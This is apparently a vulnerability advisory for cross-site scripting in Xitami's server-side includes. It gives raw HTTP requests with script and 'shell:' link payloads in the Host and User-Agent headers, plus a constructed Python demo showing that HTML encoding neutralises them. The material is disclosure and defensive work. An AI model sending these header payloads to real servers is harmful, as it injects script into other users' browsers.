Imatix Xitami Server Side Includes Cross-Site Scripting Vulnerability
No exploit is required to leverage this issue. The following proof of concept has been provided:

Telnet (don't netcat!) to port 80:

    GET /testssi.ssi HTTP/1.1
    Host: localhost
    User-Agent: <A HREF="shell:windows\system32\calc.exe">PLEASE CLICK HERE</A>
    Connection: close

    GET /testssi.ssi HTTP/1.1
    Host: <script>alert("Please click at \"PLEASE CLICK HERE\"")</script>
    User-Agent: <A HREF="shell:windows\system32\calc.exe">PLEASE CLICK HERE</A>
    Connection: close
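
The header values in the requests above reach the browser as markup only if the server-parsed page echoes them without HTML encoding. The following added example (not part of the original advisory and not Xitami code) expands SSI echo directives with and without encoding. The contents of testssi.ssi are not given, so the template and the CGI-style variable names HTTP_HOST and HTTP_USER_AGENT are assumptions.

```python
import html
import re

# Constructed request, using the header values from the proof of concept above.
RAW_REQUEST = (
    "GET /testssi.ssi HTTP/1.1\r\n"
    'Host: <script>alert("Please click at \\"PLEASE CLICK HERE\\"")</script>\r\n'
    'User-Agent: <A HREF="shell:windows\\system32\\calc.exe">PLEASE CLICK HERE</A>\r\n'
    "Connection: close\r\n\r\n"
)

# Hypothetical SSI page: the advisory does not show what testssi.ssi contains.
SSI_PAGE = (
    '<p>Host: <!--#echo var="HTTP_HOST" --></p>\n'
    '<p>Agent: <!--#echo var="HTTP_USER_AGENT" --></p>\n'
)

ECHO = re.compile(r'<!--#echo\s+var="([A-Z_]+)"\s*-->')


def cgi_vars(raw):
    """Map request headers to CGI-style names (User-Agent -> HTTP_USER_AGENT)."""
    env = {}
    for line in raw.split("\r\n")[1:]:
        if not line:  # blank line ends the header block
            break
        name, _, value = line.partition(":")
        env["HTTP_" + name.strip().upper().replace("-", "_")] = value.strip()
    return env


def render(page, env, encode):
    """Expand echo directives; encode=True HTML-escapes each value first."""
    def expand(match):
        value = env.get(match.group(1), "")
        return html.escape(value, quote=True) if encode else value
    return ECHO.sub(expand, page)


if __name__ == "__main__":
    env = cgi_vars(RAW_REQUEST)
    print(render(SSI_PAGE, env, encode=False))  # header markup reaches the browser
    print(render(SSI_PAGE, env, encode=True))   # header markup shown as inert text
```

With encoding applied at the point of output, the injected anchor and script tags are displayed as literal text instead of being interpreted by the browser.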